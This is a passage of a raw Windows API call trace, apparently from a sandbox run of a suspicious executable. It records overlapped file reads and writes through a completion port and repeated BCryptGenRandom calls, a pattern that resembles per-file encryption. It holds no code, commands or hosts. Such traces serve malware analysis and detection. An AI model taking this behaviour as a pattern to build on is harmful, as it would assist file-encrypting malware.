0x1fa91d0 [0152.701] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0152.701] free (_Block=0x1fa91d0) [0152.701] free (_Block=0x1fa2ed8) [0152.701] free (_Block=0x1fa90b8) [0152.701] WriteFile (in: hFile=0xec, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0152.701] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0152.712] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.713] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.713] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0152.713] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.714] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.714] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0152.714] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0152.714] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0152.714] free (_Block=0x3e305b8) [0152.714] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0152.714] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0152.715] free (_Block=0x1fa91d0) [0152.715] free (_Block=0x1fa2ed8) [0152.715] free (_Block=0x1fa90b8) [0152.715] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0152.715] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0152.723] CloseHandle (hObject=0x170) returned 1 [0152.723] free (_Block=0x3e70008) [0152.724] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0152.732] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1f46, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0152.740] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0152.749] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x24e2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0152.761] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0152.762] CloseHandle (hObject=0x170) returned 1 [0152.762] free (_Block=0x3d70450) [0152.762] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0152.789] WriteFile (in: hFile=0xec, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x9b40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0152.789] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0152.862] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0152.863] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0152.863] CloseHandle (hObject=0x308) returned 1 [0152.863] free (_Block=0x3df0008) [0152.863] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0152.906] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.907] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.907] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0152.907] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.908] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0152.908] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0152.908] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0152.908] free (_Block=0x3e305b8) [0152.908] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0152.908] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0152.908] free (_Block=0x1fa91d0) [0152.908] free (_Block=0x1fa2ed8) [0152.908] free (_Block=0x1fa90b8) [0152.908] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0152.909] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0152.920] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.920] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.920] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0152.920] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.921] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.921] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0152.921] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0152.921] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0152.921] free (_Block=0x3e305b8) [0152.921] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0152.921] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0152.922] free (_Block=0x1fa91d0) [0152.922] free (_Block=0x1fa2ed8) [0152.922] free (_Block=0x1fa90b8) [0152.922] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0152.922] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0152.930] CloseHandle (hObject=0x308) returned 1 [0152.930] free (_Block=0x3df0008) [0152.931] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0152.944] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x8ad6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0152.953] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0152.962] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe2e9, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0152.968] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0152.975] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.975] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.975] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0152.975] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.976] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.976] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0152.976] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0152.976] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0152.976] free (_Block=0x3e305b8) [0152.976] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0152.976] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0152.976] free (_Block=0x1fa91d0) [0152.977] free (_Block=0x1fa2ed8) [0152.977] free (_Block=0x1fa90b8) [0152.977] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0152.977] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0152.982] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x65b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0152.982] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0152.991] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.991] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.991] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0152.991] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.991] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.991] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0152.992] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0152.992] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0152.992] free (_Block=0x3e305b8) [0152.992] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0152.992] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0152.992] free (_Block=0x1fa91d0) [0152.992] free (_Block=0x1fa2ed8) [0152.992] free (_Block=0x1fa90b8) [0152.992] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0152.993] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0153.002] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x9190, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0153.002] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0153.014] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1066, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0153.122] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0153.123] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.123] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.123] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0153.123] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.124] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0153.124] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.124] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.124] free (_Block=0x3e305b8) [0153.124] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.124] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.125] free (_Block=0x1fa91d0) [0153.125] free (_Block=0x1fa2ed8) [0153.125] free (_Block=0x1fa90b8) [0153.125] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0153.125] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0153.126] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xa090, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0153.127] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0153.152] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x380a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.159] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0153.182] CloseHandle (hObject=0xec) returned 1 [0153.183] free (_Block=0x3df0008) [0153.183] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0153.192] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x89a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0153.193] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0153.201] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x26e8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0153.215] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0153.249] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x3130, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0153.249] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0153.810] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x1e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0153.811] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0153.823] ReadFile (in: hFile=0x3cc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0xdc4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0153.823] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0153.836] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.836] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.836] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0153.836] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.837] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.837] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0153.837] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.837] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.837] free (_Block=0x3e305b8) [0153.837] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.837] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.838] free (_Block=0x1fa91d0) [0153.838] free (_Block=0x1fa2ed8) [0153.838] free (_Block=0x1fa90b8) [0153.838] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.838] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0153.850] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.851] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.851] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0153.851] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.852] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0153.856] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.856] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.856] free (_Block=0x3e305b8) [0153.856] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.856] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.856] free (_Block=0x1fa91d0) [0153.856] free (_Block=0x1fa2ed8) [0153.857] free (_Block=0x1fa90b8) [0153.857] WriteFile (in: hFile=0x2a4, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0153.857] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0153.868] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.868] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0153.869] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.869] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0153.873] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.873] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.873] free (_Block=0x3e305b8) [0153.873] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.873] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.873] free (_Block=0x1fa91d0) [0153.873] free (_Block=0x1fa2ed8) [0153.873] free (_Block=0x1fa90b8) [0153.873] WriteFile (in: hFile=0x2a8, lpBuffer=0x3fb00ec, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8) returned 0x0 [0153.874] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0153.882] CloseHandle (hObject=0x170) returned 1 [0153.882] free (_Block=0x3df0008) [0153.882] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0153.885] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, 